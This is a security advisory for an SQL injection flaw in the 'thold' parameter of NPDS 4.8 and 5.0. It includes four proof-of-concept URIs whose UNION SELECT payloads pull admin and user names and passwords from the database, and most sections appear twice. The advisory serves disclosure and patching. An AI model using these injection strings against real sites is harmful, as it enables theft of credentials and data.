NPDS THOLD Parameter SQL Injection Vulnerability
BID:13649
Info
NPDS THOLD Parameter SQL Injection Vulnerability
| Bugtraq ID: | 13649 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 16 2005 12:00AM |
| Updated: | May 16 2005 12:00AM |
| Credit: | Discovery is credited to NoSP <[email protected]>. |
| Vulnerable: |
NPDS NPDS 5.0 NPDS NPDS 4.8 |
| Not Vulnerable: | |
Discussion
NPDS THOLD Parameter SQL Injection Vulnerability
NPDS is prone to an SQL injection vulnerability.
This issue is due to a failure in the application to properly sanitize user-supplied input to the 'thold' parameter.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
All versions are considered to be vulnerable at the moment.
NPDS is prone to an SQL injection vulnerability.
This issue is due to a failure in the application to properly sanitize user-supplied input to the 'thold' parameter.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
All versions are considered to be vulnerable at the moment.
Exploit / POC
NPDS THOLD Parameter SQL Injection Vulnerability
No exploit is required.
The following proof of concept URIs are available:
http://www.example.com/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
http://www.example.com/npds/comments.php?thold =0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
http://www.example.com/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM %20authors
http://www.example.com/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u
No exploit is required.
The following proof of concept URIs are available:
http://www.example.com/npds/comments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM%20authors
http://www.example.com/npds/comments.php?thold =0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20users
http://www.example.com/npds/pollcomments.php?thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,aid,pwd,0,0%20FROM %20authors
http://www.example.com/npds/pollcomments.php?op=results&pollID=2&mode=&order=&thold=0%20UNION%20SELECT%200,0,0,0,0,0,0,0,uname,pass,0,0%20FROM%20u
Solution / Fix
NPDS THOLD Parameter SQL Injection Vulnerability
Solution:
A fix is available from the following location:
http://www.npds.org/article.php?sid=1254&thold=0
Solution:
A fix is available from the following location:
http://www.npds.org/article.php?sid=1254&thold=0
References
NPDS THOLD Parameter SQL Injection Vulnerability
References:
References:
- NPDS Homepage (NPDS)
- NPDS Input Validation Holes in 'comments.php' and 'pollcomments.php' Permit SQL (SecurityTracker)